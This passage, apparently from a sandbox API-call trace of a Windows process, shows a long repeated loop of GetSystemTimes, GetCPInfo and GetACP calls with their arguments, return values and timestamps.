lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.831] GetACP () returned 0x4e4 [0113.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.831] GetACP () returned 0x4e4 [0113.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.831] GetACP () returned 0x4e4 [0113.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.831] GetACP () returned 0x4e4 [0113.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.831] GetACP () returned 0x4e4 [0113.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.832] GetACP () returned 0x4e4 [0113.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.832] GetACP () returned 0x4e4 [0113.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.832] GetACP () returned 0x4e4 [0113.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.832] GetACP () returned 0x4e4 [0113.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.832] GetACP () returned 0x4e4 [0113.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.832] GetACP () returned 0x4e4 [0113.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.832] GetACP () returned 0x4e4 [0113.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.834] GetACP () returned 0x4e4 [0113.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.834] GetACP () returned 0x4e4 [0113.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.834] GetACP () returned 0x4e4 [0113.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.834] GetACP () returned 0x4e4 [0113.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.834] GetACP () returned 0x4e4 [0113.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.834] GetACP () returned 0x4e4 [0113.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.834] GetACP () returned 0x4e4 [0113.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.835] GetACP () returned 0x4e4 [0113.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.835] GetACP () returned 0x4e4 [0113.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.835] GetACP () returned 0x4e4 [0113.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.835] GetACP () returned 0x4e4 [0113.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.835] GetACP () returned 0x4e4 [0113.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.835] GetACP () returned 0x4e4 [0113.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.835] GetACP () returned 0x4e4 [0113.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.835] GetACP () returned 0x4e4 [0113.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.836] GetACP () returned 0x4e4 [0113.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.836] GetACP () returned 0x4e4 [0113.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.836] GetACP () returned 0x4e4 [0113.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.836] GetACP () returned 0x4e4 [0113.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.836] GetACP () returned 0x4e4 [0113.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.836] GetACP () returned 0x4e4 [0113.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.836] GetACP () returned 0x4e4 [0113.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.836] GetACP () returned 0x4e4 [0113.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.837] GetACP () returned 0x4e4 [0113.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.837] GetACP () returned 0x4e4 [0113.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.837] GetACP () returned 0x4e4 [0113.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.837] GetACP () returned 0x4e4 [0113.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.837] GetACP () returned 0x4e4 [0113.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.837] GetACP () returned 0x4e4 [0113.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.837] GetACP () returned 0x4e4 [0113.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.837] GetACP () returned 0x4e4 [0113.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.837] GetACP () returned 0x4e4 [0113.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.838] GetACP () returned 0x4e4 [0113.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.838] GetACP () returned 0x4e4 [0113.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.838] GetACP () returned 0x4e4 [0113.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.838] GetACP () returned 0x4e4 [0113.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.838] GetACP () returned 0x4e4 [0113.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.838] GetACP () returned 0x4e4 [0113.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.838] GetACP () returned 0x4e4 [0113.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.838] GetACP () returned 0x4e4 [0113.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.839] GetACP () returned 0x4e4 [0113.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.839] GetACP () returned 0x4e4 [0113.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.839] GetACP () returned 0x4e4 [0113.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.839] GetACP () returned 0x4e4 [0113.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.839] GetACP () returned 0x4e4 [0113.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.839] GetACP () returned 0x4e4 [0113.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.839] GetACP () returned 0x4e4 [0113.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.839] GetACP () returned 0x4e4 [0113.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.840] GetACP () returned 0x4e4 [0113.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.840] GetACP () returned 0x4e4 [0113.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.840] GetACP () returned 0x4e4 [0113.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.840] GetACP () returned 0x4e4 [0113.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.840] GetACP () returned 0x4e4 [0113.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.840] GetACP () returned 0x4e4 [0113.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.840] GetACP () returned 0x4e4 [0113.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.840] GetACP () returned 0x4e4 [0113.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.841] GetACP () returned 0x4e4 [0113.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.841] GetACP () returned 0x4e4 [0113.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.841] GetACP () returned 0x4e4 [0113.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.841] GetACP () returned 0x4e4 [0113.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.841] GetACP () returned 0x4e4 [0113.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.841] GetACP () returned 0x4e4 [0113.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.841] GetACP () returned 0x4e4 [0113.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.841] GetACP () returned 0x4e4 [0113.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: 